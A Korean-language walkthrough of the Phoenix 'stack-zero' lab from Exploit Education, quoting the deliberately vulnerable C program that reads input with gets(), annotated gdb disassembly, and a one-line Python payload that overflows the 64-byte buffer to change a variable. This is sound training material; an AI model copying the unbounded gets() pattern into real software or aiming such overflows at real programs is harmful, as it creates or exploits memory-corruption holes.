[Phoenix] Stack Zero

1. intro

2. code 및 분석

2.1.  C code

/*
 * phoenix/stack-zero, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable.
 *
 * Scientists have recently discovered a previously unknown species of
 * kangaroos, approximately in the middle of Western Australia. These
 * kangaroos are remarkable, as their insanely powerful hind legs give them
 * the ability to jump higher than a one story house (which is approximately
 * 15 feet, or 4.5 metres), simply because houses can't can't jump.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer);

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts(
        "Uh oh, 'changeme' has not yet been changed. Would you like to try "
        "again?");
  }

  exit(0);
}

 

2.2. 분석

첫번째 문제는 locals.changeme 변수가 0이 아니면 성공하는 것이다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

gets 함수로 local.buffer 변수에 값을 받아들이며, 크기 제한이 없기에 다른 주소의 값을 변조할 수 있다.

 

3.2. 공격 준비

어렵지 않으니 후닥 풀어보자.

결국 변수의 위치만 확인하면 되기에 gdb로 disassemble만 해봐도 답이 나온다.

   0x00000000004005dd <+0>:     push   %rbp
   0x00000000004005de <+1>:     mov    %rsp,%rbp
   0x00000000004005e1 <+4>:     sub    $0x60,%rsp
   0x00000000004005e5 <+8>:     mov    %edi,-0x54(%rbp)
   0x00000000004005e8 <+11>:    mov    %rsi,-0x60(%rbp)
   0x00000000004005ec <+15>:    mov    $0x400680,%edi
   0x00000000004005f1 <+20>:    callq  0x400440 <puts@plt>
   0x00000000004005f6 <+25>:    movl   $0x0,-0x10(%rbp)
   0x00000000004005fd <+32>:    lea    -0x50(%rbp),%rax     #rbp-0x50위치에 값을 받아들임.
   0x0000000000400601 <+36>:    mov    %rax,%rdi
   0x0000000000400604 <+39>:    callq  0x400430 <gets@plt>
=> 0x0000000000400609 <+44>:    mov    -0x10(%rbp),%eax     #rbp-0x10과 받아들인 값을 비교함.
   0x000000000040060c <+47>:    test   %eax,%eax
   0x000000000040060e <+49>:    je     0x40061c <main+63>
   0x0000000000400610 <+51>:    mov    $0x4006d0,%edi
   0x0000000000400615 <+56>:    callq  0x400440 <puts@plt>
   0x000000000040061a <+61>:    jmp    0x400626 <main+73>
   0x000000000040061c <+63>:    mov    $0x400708,%edi
   0x0000000000400621 <+68>:    callq  0x400440 <puts@plt>
   0x0000000000400626 <+73>:    mov    $0x0,%edi
   0x000000000040062b <+78>:    callq  0x400450 <exit@plt>

그러므로 0x41 이상의 값만 들어가면 된다.

 

4. exploit

user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*0x40') | ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Uh oh, 'changeme' has not yet been changed. Would you like to try again?

user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*0x41') | ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!